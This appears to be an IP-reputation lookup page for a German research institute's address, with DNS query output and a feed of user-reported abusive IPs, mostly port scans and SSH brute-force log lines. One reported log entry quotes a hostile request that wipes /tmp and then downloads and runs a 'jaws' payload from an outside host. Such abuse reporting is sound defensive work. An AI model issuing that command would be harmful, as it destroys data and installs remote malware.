Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Germany

Internet Service Provider: unknown

Hostname: unknown

Organization: FZI Forschungszentrum Informatik am Karlsruher Institut fuer Technologie

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 141.21.131.143
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 46558
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;141.21.131.143.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019083000 1800 900 604800 86400

;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sat Aug 31 01:05:49 CST 2019
;; MSG SIZE  rcvd: 118
Host info
Host 143.131.21.141.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
*** Can't find 143.131.21.141.in-addr.arpa.: No answer

Authoritative answers can be found from:

Related IP info:
Related comments:
IP Type Details Datetime
51.38.64.40 attack
Unauthorized connection attempt detected from IP address 51.38.64.40 to port 2220 [J]
2020-02-06 04:54:46
49.234.30.46 attack
Feb  5 20:47:57 srv-ubuntu-dev3 sshd[78206]: Invalid user insurgency from 49.234.30.46
Feb  5 20:47:57 srv-ubuntu-dev3 sshd[78206]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.234.30.46
Feb  5 20:47:57 srv-ubuntu-dev3 sshd[78206]: Invalid user insurgency from 49.234.30.46
Feb  5 20:47:59 srv-ubuntu-dev3 sshd[78206]: Failed password for invalid user insurgency from 49.234.30.46 port 34098 ssh2
Feb  5 20:51:18 srv-ubuntu-dev3 sshd[78600]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.234.30.46  user=root
Feb  5 20:51:19 srv-ubuntu-dev3 sshd[78600]: Failed password for root from 49.234.30.46 port 59296 ssh2
Feb  5 20:54:05 srv-ubuntu-dev3 sshd[78861]: Invalid user az from 49.234.30.46
Feb  5 20:54:05 srv-ubuntu-dev3 sshd[78861]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.234.30.46
Feb  5 20:54:05 srv-ubuntu-dev3 sshd[78861]: Invalid user az from 49.23
...
2020-02-06 05:17:53
171.37.104.197 attackspam
Unauthorized connection attempt detected from IP address 171.37.104.197 to port 2220 [J]
2020-02-06 05:30:26
162.243.42.225 attackbots
Unauthorized connection attempt detected from IP address 162.243.42.225 to port 2220 [J]
2020-02-06 05:31:07
203.170.138.159 attackspambots
Unauthorized connection attempt detected from IP address 203.170.138.159 to port 23 [J]
2020-02-06 05:02:37
179.57.158.28 attack
Honeypot attack, port: 5555, PTR: PTR record not found
2020-02-06 05:08:24
179.95.213.22 attack
Unauthorized connection attempt detected from IP address 179.95.213.22 to port 23 [J]
2020-02-06 05:08:09
36.55.233.227 attack
Unauthorized connection attempt detected from IP address 36.55.233.227 to port 2220 [J]
2020-02-06 04:59:08
192.241.231.223 attackbots
Unauthorized connection attempt detected from IP address 192.241.231.223 to port 7777 [J]
2020-02-06 05:26:02
140.127.23.148 attackspam
Unauthorized connection attempt detected from IP address 140.127.23.148 to port 5900 [J]
2020-02-06 05:32:53
41.179.253.229 attack
Unauthorized connection attempt detected from IP address 41.179.253.229 to port 80 [J]
2020-02-06 04:58:30
201.150.26.14 attack
201.150.26.14 - - [05/Feb/2020:18:16:38 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 488 "-" "Hello, world"
2020-02-06 05:24:01
78.179.44.43 attack
Unauthorized connection attempt detected from IP address 78.179.44.43 to port 8080 [J]
2020-02-06 05:16:38
222.96.109.67 attack
Unauthorized connection attempt detected from IP address 222.96.109.67 to port 5555 [J]
2020-02-06 05:22:16
162.62.26.228 attackspam
Unauthorized connection attempt detected from IP address 162.62.26.228 to port 43 [J]
2020-02-06 05:10:56

Recently Reported IPs

58.179.179.254 107.126.134.206 111.1.253.67 64.172.73.84
156.246.109.63 222.66.208.108 107.153.232.11 200.233.14.196
124.228.212.69 156.59.223.217 207.92.40.40 180.155.6.224
1.129.91.233 101.122.154.64 64.55.239.10 123.53.98.101
199.27.117.201 118.117.238.27 47.85.19.190 98.193.187.246